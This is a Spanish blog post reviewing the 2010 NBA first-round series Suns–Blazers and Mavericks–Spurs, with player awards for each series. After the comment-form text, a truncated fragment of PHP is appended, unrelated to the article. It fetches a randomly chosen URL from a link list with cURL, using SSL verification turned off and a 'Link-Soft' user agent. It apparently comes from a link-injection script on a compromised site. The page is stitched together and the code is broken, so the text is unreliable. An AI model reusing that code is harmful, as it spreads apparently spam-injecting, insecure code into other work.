Playoffs 2009-2010: Primera Ronda del Oeste (I)

30 de April de 2010 por txusma

Suns 4 – Blazers 2 (TheDeerHunter)

Se preveía igualdad y la ha habido. El favorito era Phoenix, con mínimas reservas que por momentos parecían confirmarse, pero la baja de Roy y su prematura e intrascendente vuelta han terminado siendo claves, sobretodo en lo que se refiere a la contribución de Jason Richardson, excesivamente liberado. Una vía de agua en los sólidos pilares defensivos. McMillan ha conseguido rebajar los 110 puntos por partido que promediaban los Suns en la regular, pero esa desatada producción de Richardson ha logrado que no sea tanto como para poder resolver anotando poco más de 93 con una ofensiva bastante huérfana de liderazgo. Y eso que Aldridge se ha esforzado en ser una buena referencia, bailando siempre con las más fea, o Miller y Bayless que se han mostrado excesivamente irregulares. Un equipo excesivamente jerarquizado sobre los hombros de Roy y que finalmente no ha podido adaptarse a tanta dificultad. Los Suns, sin embargo se han mostrado superiores colectivamente. Buena aportación de secundarios como Hill, Frye, Dudley, Dragic o Barbosa. También eso le ha faltado a Portland.

MVP: Jason Richardson recordando por momentos al de sus mejores tardes. 23.5 puntos, casi 7 rebotes más un robo y una asistencia. Abusivos porcentajes. Es difícil imaginar que hubiera sido así con Roy delante en condiciones normales.

El rookie: El “joven y prometedor” Grant Hill… será uno de los rookies para la segunda ronda.

La sorpresa: Cerca de 40 puntos por partido vitales que han promediado Hill-Barbosa-Frye-Dudley y Dragic. Gran actuación de la intendencia en Phoenix. De lo mejorcito que hemos visto como fondo de armario en estos playoffs de momento.

La decepción: Rudy Fernandez y su más que posible última ocasión perdida en Portland. El especialista “raza blanca” tirador  de McMillan que jamás fue especialista tirador. Las intermitentes aportaciones de Webster y Juwan Howard también deberían ser objeto de análisis, porque esos 3 tíos tan malos no son.

El mayor esfuerzo en vano: LaMarcus Aldridge ha llegado por momentos a igualar o incluso a superar a su par all-star Amare Stoudemire. Junto a Camby han logrado dominar el juego interior que suele ser la llave para pasar rondas en playoffs. Finalmente no ha sido suficiente. Mención a parte tiene el regreso precipitado de Roy. Su aportación no ha sido significativa para tanta urgencia.

Mavs 2 – Spurs 4

La mayoría de los aficionados daban como favoritos a los Dallas Mavericks aunque con la boca muy pequeña. Es lo mínimo que has de hacer si enfrente te encuentras a Duncan, Ginobili, Parker, Popovic y el resto de los integrantes de los Spurs. Nadar y guardar la ropa, brillante lección que aún no ha aprendido Mark Cuban y no será porque no ha tenido oportunidades.

El considerado superior equipo de los Mavs ha visto naufragar casi todas sus naves con tan solo Caron Butler y Dirk Nowitzki dando la cara. El resto del nucleo duro de la plantilla no ha sido capaz de dar ese paso adelante que hay que dar en los Playoffs y su rendimiento se ha resentido. Habría que discutir que parte de culpa tiene Rick Carlisle en todo esto, mareando a Haywood y Dampier con la titularidad o condenando al ostracismo a Rodrigue Beaubois hasta el último partido de la serie, cuando ya era demasiado tarde. Un dato: los Mavs han anotado 92.8 puntos por partido, casi 10 puntos menos que durante la temporada.

En los Spurs ha sucedido todo lo contrario. Como ya viene siendo habitual, los púpilos de Popovic se han guardado lo mejor para el momento preciso de la temporada, sobretodo Manu Ginobili y la gran sorpresa, George Hill, que ya se ha ha hecho con un hueco importante en el equipo. Han tirado de experiencia y galones para llevarse la eliminatoria, algo que en realidad no sorprende a nadie porque de los Spurs siempre te lo esperas.

MVP: El día que los Spurs draftearon a Manu Ginobili con la 28ª elección de la segunda ronda debería ser festivo en San Antonio. El argentino ha liderado al equipo en anotación por encima de un Tim Duncan que aún da lecciones a más de uno y más de dos.

Rookie: Papeles testimoniales de los rookies en una guerra que no es la suya todavía. De todas maneras lo mínimo que se les puede pedir es que dan lo máximo cuando se lo requieren y eso es lo que han hecho Rodrigue Beaubois y DaJuan Blair.

Sorpresa: Impresionante actuación de George Hill, sobretodo en el 4º partido de la serie que dejaba a los Mavs contra las cuerdas. Aquel día el jugador de segundo año anotó 29 puntos.

Decepción: De los Mavs tan solo salvaría a Dirk, Butler y Beaubois. El resto, si los Mavs fueran el Madrid ya aparecían en las portadas de MARCA como integrantes de una de esas famosas listas negras de todos los años.

Esfuerzo en vano: Dirk Nowitzki se va para casa una vez más, esta vez promediando 26.7 puntos y 8,2 rebotes. Viendo la actuación de sus compañeros la cara de tonto que se le habrá quedado debe ser de órdago.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>